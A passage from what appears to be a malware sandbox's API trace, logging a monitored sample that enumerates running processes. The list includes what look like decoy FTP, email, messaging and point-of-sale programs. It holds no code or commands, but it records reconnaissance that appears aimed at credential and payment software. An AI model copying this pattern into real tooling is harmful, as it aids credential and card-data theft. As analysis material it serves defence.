cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0264.392] CloseHandle (hObject=0x9e0) returned 1 [0264.392] Sleep (dwMilliseconds=0x64) [0264.500] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0264.513] Process32First (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.515] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0264.517] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0264.519] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0264.521] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0264.522] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0264.523] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0264.525] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0264.527] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0264.531] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.533] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.535] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0264.537] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.539] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.541] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.543] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.571] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.573] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.576] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.578] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0264.580] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0264.582] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0264.583] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.585] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0264.587] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0264.589] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0264.591] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0264.593] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.595] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0264.597] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0264.599] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0264.600] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0264.602] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0264.604] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0264.622] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0264.624] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0264.627] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0264.629] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0264.631] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0264.633] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0264.635] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0264.636] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0264.639] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0264.641] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0264.643] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0264.645] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0264.647] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0264.649] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0264.650] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0264.652] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0264.654] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0264.656] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0264.658] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0264.660] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0264.662] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0264.664] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0264.666] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0264.732] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0264.735] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0264.738] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0264.740] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0264.743] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0264.745] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0264.748] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0264.750] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0264.753] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0264.755] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0264.757] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0264.760] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0264.763] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0264.765] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0264.767] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0264.770] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0264.772] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0264.774] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0264.776] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0264.818] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0264.820] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0264.822] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0264.825] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0264.830] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0264.833] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0264.835] Process32Next (in: 